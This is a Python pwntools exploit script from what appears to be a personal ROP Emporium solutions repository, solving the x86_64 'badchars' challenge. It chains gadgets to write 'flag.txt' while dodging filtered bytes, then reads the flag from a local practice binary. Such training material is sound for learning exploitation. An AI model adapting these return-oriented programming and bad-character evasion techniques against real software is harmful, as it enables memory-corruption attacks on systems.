rop/x86_64/badchars/exploit.py
Brett Weiland 3f54969f58 new file: x86_64/badchars/exploit.py
new file:   x86_64/badchars/exploit_dirty.py
	new file:   x86_64/badchars/usefullstuff
	deleted:    x86_64/write4/.exploit.py.swp
	deleted:    x86_64/write4/.useful_gadgets.swp
	modified:   x86_64/write4/exploit.py
2020-12-16 21:33:39 -06:00

54 lines
1.3 KiB
Python
Executable File

#!/usr/bin/env python3
from pwn import *
from time import sleep
def strfixandcopy(dest, string, badchars, payload):
badchar_locations = []
fixed_str = b''
for n,l in enumerate(string):
if l in badchars:
fixed_str += bytes([ord(string[n]) - 1])
badchar_locations.append(n)
else:
fixed_str += bytes([ord(string[n])])
payload += p64(0x000000000040069c) # pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
payload += fixed_str # r12
payload += p64(dest) # r13
payload += p64(1) # r14
payload += p64(1) # r15
payload += p64(0x0000000000400634) # moves fixed string
for badchar_location in badchar_locations:
payload += p64(0x00000000004006a0) # pop r14, r15
payload += p64(1)
payload += p64(dest + badchar_location)
payload += p64(0x000000000040062c) #does the adding
return(payload)
prog = process('./badchars')
payload = b''
for c in range(40):
payload += b'a'
payload = strfixandcopy(0x601be0, 'flag.txt', 'xga.', payload)
payload += p64(0x00000000004006a3)
payload += p64(0x601be0)
payload += p64(0x0000000000400510)
payload += b"\n"
prog.sendline(payload)
sleep(0.5)
print(str(prog.recv(), 'UTF-8'))
prog.close()